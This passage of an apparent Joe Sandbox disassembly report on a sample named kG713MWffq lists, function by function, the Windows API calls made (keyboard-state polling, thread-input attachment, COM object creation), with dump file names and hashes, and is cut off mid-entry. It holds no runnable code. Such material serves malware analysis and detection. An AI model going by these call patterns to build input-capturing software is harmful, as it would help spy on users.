                                                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 3413494760-0
                                                                                        • Opcode ID: e94a351051a0650a6d145f307f0eea7b662f646848f9bee82b656bed35363f0e
                                                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                        • Opcode Fuzzy Hash: e94a351051a0650a6d145f307f0eea7b662f646848f9bee82b656bed35363f0e
                                                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                        • String ID: AU3_FreeVar
                                                                                        • API String ID: 2634073740-771828931
                                                                                        • Opcode ID: da08cc041a21d481ca46116ab47081ac4fbb3e56b80667e79e82d75b6ee56f55
                                                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                        • Opcode Fuzzy Hash: da08cc041a21d481ca46116ab47081ac4fbb3e56b80667e79e82d75b6ee56f55
                                                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                        APIs
                                                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 2294789929-1287834457
                                                                                        • Opcode ID: 0198b108f76d52af3bbd9fee550614c588b241b933c9d0f3746922e50da14242
                                                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                        • Opcode Fuzzy Hash: 0198b108f76d52af3bbd9fee550614c588b241b933c9d0f3746922e50da14242
                                                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                        APIs
                                                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                        • API String ID: 2483343779-2107944366
                                                                                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                        • _wcslen.LIBCMT ref: 00450720
                                                                                        • _wcscat.LIBCMT ref: 00450733
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                                                        • String ID: -----$SysListView32
                                                                                        • API String ID: 4008455318-3975388722
                                                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                        APIs
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                        • GetParent.USER32 ref: 00469C98
                                                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                        • GetParent.USER32 ref: 00469CBC
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 2360848162-1403004172
                                                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                        • String ID:
                                                                                        • API String ID: 262282135-0
                                                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 312131281-0
                                                                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                        APIs
                                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                        • SendMessageW.USER32(76C223D0,00001001,00000000,?), ref: 00448E16
                                                                                        • SendMessageW.USER32(76C223D0,00001026,00000000,?), ref: 00448E25
                                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3771399671-0
                                                                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 0-1603158881
                                                                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
